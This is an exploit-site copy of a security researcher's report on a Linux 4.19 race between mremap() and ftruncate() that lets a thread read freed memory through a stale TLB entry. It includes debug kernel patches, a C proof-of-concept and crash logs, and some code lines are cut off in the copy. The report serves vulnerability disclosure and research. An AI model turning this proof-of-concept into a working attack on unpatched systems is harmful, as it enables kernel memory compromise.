Edit Report

Our sensors found this exploit at:

Below is a copy:

Linux mremap() TLB Flush Too Late
Linux: mremap() TLB flush too late with concurrent ftruncate() 


Tested on the master branch (4.19.0-rc7+).

sys_mremap() takes current->mm->mmap_sem for writing, then calls
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE
locks) in a loop, then performs a TLB flush with flush_tlb_range().
move_ptes() can also perform TLB flushes, but only when dirty PTEs are
encountered - non-dirty, accessed PTEs don't trigger such early flushes.
Between the move_ptes() loop and the TLB flush, the only lock being
held in move_page_tables() is current->mm->mmap_sem.

->zap_page_range_single() can concurrently access the page tables of a
process that is in move_page_tables(), between the move_ptes() loop
and the TLB flush.

The following race can occur in a process with three threads A, B and C:

A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED
C: starts reading from address X in a busyloop
A: starts an mremap() call that remaps from X to Y; syscall progresses
   until directly before the flush_tlb_range() call in
[at this point, the PTE for X is gone, but C still has a read-only TLB
entry for X; the PTE for Y has been created]
B: uses sys_ftruncate() to change the file size to zero. this removes
   the PTE for address Y, then sends a TLB flush IPI *for address Y*.
   TLB entries *for address X* stays alive.

The kernel now assumes that the page is not referenced by any
userspace task anymore, but actually, thread C can still use the stale
TLB entry at address X to read from it.

At this point, the page can be freed as soon as it disappears from the
LRU list (which I don't really understand); it looks like there are
various kernel interfaces that can be used to trigger
lru_add_drain_all(). For simplicitly, I am using root privileges to
write to /proc/sys/vm/compact_memory in order to trigger this.

To test this, I configured my kernel with PAGE_TABLE_ISOLATION=n,
commandline flag "page_poison=1". I patched the kernel as follows to
widen the race window (and make debugging easier). A copy of the patch
is attached.

diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c
index e96b99eb800c..8156628a6204 100644
--- a/arch/x86/mm/tlb.c
+++ b/arch/x86/mm/tlb.c
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)
        if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))
+       if (strcmp(current->comm, "race2") == 0) {
+               pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",
+                       f->start, f->end);
+       }
        flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);
diff --git a/mm/compaction.c b/mm/compaction.c
index faca45ebe62d..27594b4868ec 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)
        int nid;
+       pr_warn("compact_nodes entry\n");
        /* Flush pending updates to the LRU lists */
+       pr_warn("compact_nodes exit\n");
 /* The written value is actually unused, all memory is compacted */
diff --git a/mm/mremap.c b/mm/mremap.c
index 5c2e18505f75..be34e0a7258e 100644
--- a/mm/mremap.c
+++ b/mm/mremap.c
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,
                flush_tlb_range(vma, old_end - len, old_end);
                *need_flush = true;
        pte_unmap_unlock(old_pte - 1, old_ptl);
        if (need_rmap_locks)
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,
                move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,
                          new_pmd, new_addr, need_rmap_locks, &need_flush);
-       if (need_flush)
+       if (need_flush) {
+               if (strcmp(current->comm, "race") == 0) {
+                       int i;
+                       pr_warn("spinning before flush\n");
+                       for (i=0; i<100000000; i++) barrier();
+                       pr_warn("spinning before flush done\n");
+               }
                flush_tlb_range(vma, old_end-len, old_addr);
+               if (strcmp(current->comm, "race") == 0) {
+                       pr_warn("flush done\n");
+               }
+       }
        mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);
diff --git a/mm/page_poison.c b/mm/page_poison.c
index aa2b3d34e8ea..5ffe8b998573 100644
--- a/mm/page_poison.c
+++ b/mm/page_poison.c
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)
        void *addr = kmap_atomic(page);
+       if (*(unsigned long *)addr == 0x4141414141414141UL) {
+               WARN(1, "PAGE FREEING BACKTRACE");
+       }
        memset(addr, PAGE_POISON, PAGE_SIZE);
diff --git a/mm/shmem.c b/mm/shmem.c
index 446942677cd4..838b5f77cc0e 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                if (newsize <= oldsize) {
                        loff_t holebegin = round_up(newsize, PAGE_SIZE);
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr entry\n");
+                       }
                        if (oldsize > holebegin)
                                                        holebegin, 0, 1);
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                                                        holebegin, 0, 1);
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr exit\n");
+                       }
                         * Part of the huge page can be beyond i_size: subject
                         * to shrink under memory pressure.

Then, I ran the following testcase a few times (compile with
"gcc -O2 -o race race.c -pthread"; note that the filename matters for
the kernel patch):

#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define ul unsigned long

static int alloc_fd = -1;
#define allocptr ((ul *)0x100000000000)
#define allocptr2 ((ul *)0x100000002000)

void *reader_fn(void *dummy) {
  prctl(PR_SET_NAME, "race2");
  while (1) {
    ul x = *(volatile ul *)allocptr;
    if (x != 0x4141414141414141UL) {
      printf("GOT 0x%016lx\n", x);

void *truncate_fn(void *dummy) {
  if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");
  int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);
  if (sysctl_fd == -1) err(1, "unable to open sysctl");
  write(sysctl_fd, "1", 1);
  return 0;

int main(void) {
  alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);
  if (alloc_fd == -1) err(1, "open");
  char buf[0x1000];
  memset(buf, 0x41, sizeof(buf));
  if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");
  if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");

  pthread_t reader;
  if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");

  pthread_t truncator;
  if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");

  if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");
  return 0;

After a few attempts, I get the following output:

user@debian:~/mremap_ftruncate_race$ sudo ./race
GOT 0xaaaaaaaaaaaaaaaa
Segmentation fault

Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.

dmesg reports:
shmem_setattr entry
shmem_setattr exit
spinning before flush
shmem_setattr entry
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000
shmem_setattr exit
compact_nodes entry
------------[ cut here ]------------
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180
Modules linked in: btrfs xor zstd_compress raid6_pq
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G        W         4.19.0-rc7+ #188
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Workqueue: mm_percpu_wq lru_add_drain_per_cpu
RIP: 0010:kernel_poison_pages+0x10a/0x180
Call Trace:
 ? __mod_zone_page_state+0x66/0xa0
 ? pagevec_move_tail_fn+0x2b0/0x2b0
 ? process_one_work+0x400/0x400
 ? kthread_create_worker_on_cpu+0x70/0x70
---[ end trace aed8d7b167ea0097 ]---
compact_nodes exit
spinning before flush done
flush done
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: jannh

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.